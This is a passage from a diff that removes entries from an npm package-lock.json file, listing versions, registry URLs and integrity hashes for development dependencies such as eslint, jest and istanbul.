"^2.1.0", - "@eslint/js": "8.44.0", - "@humanwhocodes/config-array": "^0.11.10", - "@humanwhocodes/module-importer": "^1.0.1", - "@nodelib/fs.walk": "^1.2.8", - "ajv": "^6.10.0", - "chalk": "^4.0.0", - "cross-spawn": "^7.0.2", - "debug": "^4.3.2", - "doctrine": "^3.0.0", - "escape-string-regexp": "^4.0.0", - "eslint-scope": "^7.2.0", - "eslint-visitor-keys": "^3.4.1", - "espree": "^9.6.0", - "esquery": "^1.4.2", - "esutils": "^2.0.2", - "fast-deep-equal": "^3.1.3", - "file-entry-cache": "^6.0.1", - "find-up": "^5.0.0", - "glob-parent": "^6.0.2", - "globals": "^13.19.0", - "graphemer": "^1.4.0", - "ignore": "^5.2.0", - "import-fresh": "^3.0.0", - "imurmurhash": "^0.1.4", - "is-glob": "^4.0.0", - "is-path-inside": "^3.0.3", - "js-yaml": "^4.1.0", - "json-stable-stringify-without-jsonify": "^1.0.1", - "levn": "^0.4.1", - "lodash.merge": "^4.6.2", - "minimatch": "^3.1.2", - "natural-compare": "^1.4.0", - "optionator": "^0.9.3", - "strip-ansi": "^6.0.1", - "strip-json-comments": "^3.1.0", - "text-table": "^0.2.0" - } - }, - "eslint-scope": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/eslint-scope/-/eslint-scope-7.2.0.tgz", - "integrity": "sha512-DYj5deGlHBfMt15J7rdtyKNq/Nqlv5KfU4iodrQ019XESsRnwXH9KAE0y3cwtUHDo2ob7CypAnCqefh6vioWRw==", - "dev": true, - "peer": true, - "requires": { - "esrecurse": "^4.3.0", - "estraverse": "^5.2.0" - } - }, - "eslint-visitor-keys": { - "version": "3.4.1", - "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-3.4.1.tgz", - "integrity": "sha512-pZnmmLwYzf+kWaM/Qgrvpen51upAktaaiI01nsJD/Yr3lMOdNtq0cxkrrg16w64VtisN6okbs7Q8AfGqj4c9fA==", - "dev": true, - "peer": true - }, - "espree": { - "version": "9.6.0", - "resolved": "https://registry.npmjs.org/espree/-/espree-9.6.0.tgz", - "integrity": "sha512-1FH/IiruXZ84tpUlm0aCUEwMl2Ho5ilqVh0VvQXw+byAz/4SAciyHLlfmL5WYqsvD38oymdUwBss0LtK8m4s/A==", - "dev": true, - "peer": true, - "requires": { - "acorn": "^8.9.0", - "acorn-jsx": "^5.3.2", - "eslint-visitor-keys": "^3.4.1" - } - }, - "esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true - }, - "esquery": { - "version": "1.5.0", - "resolved": "https://registry.npmjs.org/esquery/-/esquery-1.5.0.tgz", - "integrity": "sha512-YQLXUplAwJgCydQ78IMJywZCceoqk1oH01OERdSAJc/7U2AylwjhSCLDEtqwg811idIS/9fIU5GjG73IgjKMVg==", - "dev": true, - "peer": true, - "requires": { - "estraverse": "^5.1.0" - } - }, - "esrecurse": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/esrecurse/-/esrecurse-4.3.0.tgz", - "integrity": "sha512-KmfKL3b6G+RXvP8N1vr3Tq1kL/oCFgn2NYXEtqP8/L3pKapUA4G8cFVaoF3SU323CD4XypR/ffioHmkti6/Tag==", - "dev": true, - "peer": true, - "requires": { - "estraverse": "^5.2.0" - } - }, - "estraverse": { - "version": "5.3.0", - "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-5.3.0.tgz", - "integrity": "sha512-MMdARuVEQziNTeJD8DgMqmhwR11BRQ/cBP+pLtYdSTnf3MIO8fFeiINEbX36ZdNlfU/7A9f3gUw49B3oQsvwBA==", - "dev": true, - "peer": true - }, - "esutils": { - "version": "2.0.3", - "resolved": "https://registry.npmjs.org/esutils/-/esutils-2.0.3.tgz", - "integrity": "sha512-kVscqXk4OCp68SZ0dkgEKVi6/8ij300KBWTJq32P/dYeWTSwK41WyTxalN1eRmA5Z9UU/LX9D7FWSmV9SAYx6g==", - "dev": true, - "peer": true - }, - "execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "requires": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - } - }, - "exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true - }, - "expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-2Zks0hf1VLFYI1kbh0I5jP3KHHyCHpkfyHBzsSXRFgl/Bg9mWYfMW8oD+PdMPlEwy5HNsR9JutYy6pMeOh61nw==", - "dev": true, - "requires": { - "@jest/expect-utils": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0" - } - }, - "extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" - }, - "extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==" - }, - "fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" - }, - "fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" - }, - "fast-levenshtein": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/fast-levenshtein/-/fast-levenshtein-2.0.6.tgz", - "integrity": "sha512-DCXu6Ifhqcks7TZKY3Hxp3y6qphY5SJZmrWMDrKcERSOXWQdMhU9Ig/PYrzyw/ul9jOIyh0N4M0tbC5hodg8dw==", - "dev": true, - "peer": true - }, - "fastq": { - "version": "1.15.0", - "resolved": "https://registry.npmjs.org/fastq/-/fastq-1.15.0.tgz", - "integrity": "sha512-wBrocU2LCXXa+lWBt8RoIRD89Fi8OdABODa/kEnyeyjS5aZO5/GNvI5sEINADqP/h8M29UHTHUb53sUu5Ihqdw==", - "dev": true, - "peer": true, - "requires": { - "reusify": "^1.0.4" - } - }, - "fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "requires": { - "bser": "2.1.1" - } - }, - "file-entry-cache": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/file-entry-cache/-/file-entry-cache-6.0.1.tgz", - "integrity": "sha512-7Gps/XWymbLk2QLYK4NzpMOrYjMhdIxXuIvy2QBsLE6ljuodKvdkWs/cpyJJ3CVIVpH0Oi1Hvg1ovbMzLdFBBg==", - "dev": true, - "peer": true, - "requires": { - "flat-cache": "^3.0.4" - } - }, - "fill-range": { - "version": "7.1.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", - "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", - "dev": true, - "requires": { - "to-regex-range": "^5.0.1" - } - }, - "find-up": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-5.0.0.tgz", - "integrity": "sha512-78/PXT1wlLLDgTzDs7sjq9hzz0vXD+zn+7wypEe4fXQxCmdmqfGsEPQxmiCSQI3ajFV91bVSsvNtrJRiW6nGng==", - "dev": true, - "peer": true, - "requires": { - "locate-path": "^6.0.0", - "path-exists": "^4.0.0" - } - }, - "flat-cache": { - "version": "3.0.4", - "resolved": "https://registry.npmjs.org/flat-cache/-/flat-cache-3.0.4.tgz", - "integrity": "sha512-dm9s5Pw7Jc0GvMYbshN6zchCA9RgQlzzEZX3vylR9IqFfS8XciblUXOKfW6SiuJ0e13eDYZoZV5wdrev7P3Nwg==", - "dev": true, - "peer": true, - "requires": { - "flatted": "^3.1.0", - "rimraf": "^3.0.2" - } - }, - "flatted": { - "version": "3.2.7", - "resolved": "https://registry.npmjs.org/flatted/-/flatted-3.2.7.tgz", - "integrity": "sha512-5nqDSxl8nn5BSNxyR3n4I6eDmbolI6WT+QqR547RwxQapgjQBmtktdP+HTBb/a/zLsbzERTONyUB5pefh5TtjQ==", - "dev": true, - "peer": true - }, - "foreground-child": { - "version": "3.3.0", - "resolved": "https://registry.npmjs.org/foreground-child/-/foreground-child-3.3.0.tgz", - "integrity": "sha512-Ld2g8rrAyMYFXBhEqMz8ZAHBi4J4uS1i/CxGMDnjyFWddMXLVcDp051DZfu+t7+ab7Wv6SMqpWmyFIj5UbfFvg==", - "requires": { - "cross-spawn": "^7.0.0", - "signal-exit": "^4.0.1" - }, - "dependencies": { - "signal-exit": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", - "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==" - } - } - }, - "forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==" - }, - "fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "fsevents": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz", - "integrity": "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==", - "dev": true, - "optional": true - }, - "function-bind": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", - "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", - "dev": true - }, - "gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true - }, - "get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true - }, - "get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true - }, - "get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true - }, - "getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", - "requires": { - "assert-plus": "^1.0.0" - } - }, - "glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "requires": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - } - }, - "glob-parent": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/glob-parent/-/glob-parent-6.0.2.tgz", - "integrity": "sha512-XxwI8EOhVQgWp6iDL+3b0r86f4d6AX6zSU55HfB4ydCEuXLXc5FcYeOu+nnGftS4TEju/11rt4KJPTMgbfmv4A==", - "dev": true, - "peer": true, - "requires": { - "is-glob": "^4.0.3" - } - }, - "globals": { - "version": "13.20.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-13.20.0.tgz", - "integrity": "sha512-Qg5QtVkCy/kv3FUSlu4ukeZDVf9ee0iXLAUYX13gbR17bnejFTzr4iS9bY7kwCf1NztRNm1t91fjOiyx4CSwPQ==", - "dev": true, - "peer": true, - "requires": { - "type-fest": "^0.20.2" - } - }, - "graceful-fs": { - "version": "4.2.11", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", - "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", - "dev": true - }, - "graphemer": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/graphemer/-/graphemer-1.4.0.tgz", - "integrity": "sha512-EtKwoO6kxCL9WO5xipiHTZlSzBm7WLT627TqC/uVRd0HKmq8NXyebnNYxDoBi7wt8eTWrUrKXCOVaFq9x1kgag==", - "dev": true, - "peer": true - }, - "har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==" - }, - "har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "requires": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - } - }, - "has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true - }, - "hasown": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", - "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", - "dev": true, - "requires": { - "function-bind": "^1.1.2" - } - }, - "html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", - "requires": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" - } - }, - "human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true - }, - "ignore": { - "version": "5.2.4", - "resolved": "https://registry.npmjs.org/ignore/-/ignore-5.2.4.tgz", - "integrity": "sha512-MAb38BcSbH0eHNBxn7ql2NH/kX33OkB3lZ1BNdh7ENeRChHTYsTvWrMubiIAMNS2llXEEgZ1MUOBtXChP3kaFQ==", - "dev": true, - "peer": true - }, - "import-fresh": { - "version": "3.3.0", - "resolved": "https://registry.npmjs.org/import-fresh/-/import-fresh-3.3.0.tgz", - "integrity": "sha512-veYYhQa+D1QBKznvhUHxb8faxlrwUnxseDAbAp457E0wLNio2bOSKnjYDhMj+YiAq61xrMGhQk9iXVk5FzgQMw==", - "dev": true, - "requires": { - "parent-module": "^1.0.0", - "resolve-from": "^4.0.0" - } - }, - "import-local": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.2.0.tgz", - "integrity": "sha512-2SPlun1JUPWoM6t3F0dw0FkCF/jWY8kttcY4f599GLTSjh2OCuuhdTkJQsEcZzBqbXZGKMK2OqW1oZsjtf/gQA==", - "dev": true, - "requires": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - } - }, - "imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true - }, - "inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "requires": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "is-core-module": { - "version": "2.15.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.15.1.tgz", - "integrity": "sha512-z0vtXSwucUJtANQWldhbtbt7BnL0vxiFjIdDLAatwhDYty2bad6s+rijD6Ri4YuYJubLzIJLUidCh09e1djEVQ==", - "dev": true, - "requires": { - "hasown": "^2.0.2" - } - }, - "is-extglob": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/is-extglob/-/is-extglob-2.1.1.tgz", - "integrity": "sha512-SbKbANkN603Vi4jEZv49LeVJMn4yGwsbzZworEoyEiutsN3nJYdbO36zfhGJ6QEDpOZIFkDtnq5JRxmvl3jsoQ==", - "dev": true, - "peer": true - }, - "is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==" - }, - "is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true - }, - "is-glob": { - "version": "4.0.3", - "resolved": "https://registry.npmjs.org/is-glob/-/is-glob-4.0.3.tgz", - "integrity": "sha512-xelSayHH36ZgE7ZWhli7pW34hNbNl8Ojv5KVmkJD4hBdD3th8Tfk9vYasLM+mXWOZhFkgZfxhLSnrwRr4elSSg==", - "dev": true, - "peer": true, - "requires": { - "is-extglob": "^2.1.1" - } - }, - "is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true - }, - "is-obj": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/is-obj/-/is-obj-2.0.0.tgz", - "integrity": "sha512-drqDG3cbczxxEJRoOXcOjtdp1J/lyp1mNn0xaznRs8+muBhgQcrnbspox5X5fOw0HnMnbfDzvnEMEtqDEJEo8w==", - "dev": true - }, - "is-path-inside": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/is-path-inside/-/is-path-inside-3.0.3.tgz", - "integrity": "sha512-Fd4gABb+ycGAmKou8eMftCupSir5lRxqf4aD/vd0cD2qc4HL07OjCeuHMr8Ro4CoMaeCKDB0/ECBOVWjTwUvPQ==", - "dev": true, - "peer": true - }, - "is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true - }, - "is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" - }, - "isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==" - }, - "isomorphic-ws": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", - "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", - "requires": {} - }, - "isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" - }, - "istanbul-lib-coverage": { - "version": "3.2.2", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.2.tgz", - "integrity": "sha512-O8dpsF+r0WV/8MNRKfnmrtCWhuKjxrq2w+jpzBL5UZKTi2LeVWnWOmWRxFlesJONmc+wLAGvKQZEOanko0LFTg==", - "dev": true - }, - "istanbul-lib-instrument": { - "version": "6.0.3", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-6.0.3.tgz", - "integrity": "sha512-Vtgk7L/R2JHyyGW07spoFlB8/lpjiOLTjMdms6AFMraYt3BaJauod/NGrfnVG/y4Ix1JEuMRPDPEj2ua+zz1/Q==", - "dev": true, - "requires": { - "@babel/core": "^7.23.9", - "@babel/parser": "^7.23.9", - "@istanbuljs/schema": "^0.1.3", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^7.5.4" - }, - "dependencies": { - "semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true - } - } - }, - "istanbul-lib-report": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.1.tgz", - "integrity": "sha512-GCfE1mtsHGOELCU8e/Z7YWzpmybrx/+dSTfLrvY8qRmaY6zXTKWn6WQIjaAFw069icm6GVMNkgu0NzI4iPZUNw==", - "dev": true, - "requires": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^4.0.0", - "supports-color": "^7.1.0" - } - }, - "istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "requires": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - } - }, - "istanbul-reports": { - "version": "3.1.7", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.7.tgz", - "integrity": "sha512-BewmUXImeuRk2YY0PVbxgKAysvhRPUQE0h5QRM++nVWyubKGV0l8qQ5op8+B2DOmwSe63Jivj0BjkPQVf8fP5g==", - "dev": true, - "requires": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - } - }, - "jackspeak": { - "version": "3.4.3", - "resolved": "https://registry.npmjs.org/jackspeak/-/jackspeak-3.4.3.tgz", - "integrity": "sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw==", - "requires": { - "@isaacs/cliui": "^8.0.2", - "@pkgjs/parseargs": "^0.11.0" - } - }, - "jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.7.0.tgz", - "integrity": "sha512-NIy3oAFp9shda19hy4HK0HRTWKtPJmGdnvywu01nOqNC2vZg+Z+fvJDxpMQA88eb2I9EcafcdjYgsDthnYTvGw==", - "dev": true, - "requires": { - "@jest/core": "^29.7.0", - "@jest/types": "^29.6.3", - "import-local": "^3.0.2", - "jest-cli": "^29.7.0" - } - }, - "jest-changed-files": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.7.0.tgz", - "integrity": "sha512-fEArFiwf1BpQ+4bXSprcDc3/x4HSzL4al2tozwVpDFpsxALjLYdyiIK4e5Vz66GQJIbXJ82+35PtysofptNX2w==", - "dev": true, - "requires": { - "execa": "^5.0.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0" - } - }, - "jest-circus": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.7.0.tgz", - "integrity": "sha512-3E1nCMgipcTkCocFwM90XXQab9bS+GMsjdpmPrlelaxwD93Ad8iVEjX/vvHPdLPnFf+L40u+5+iutRdA1N9myw==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^1.0.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.7.0", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": 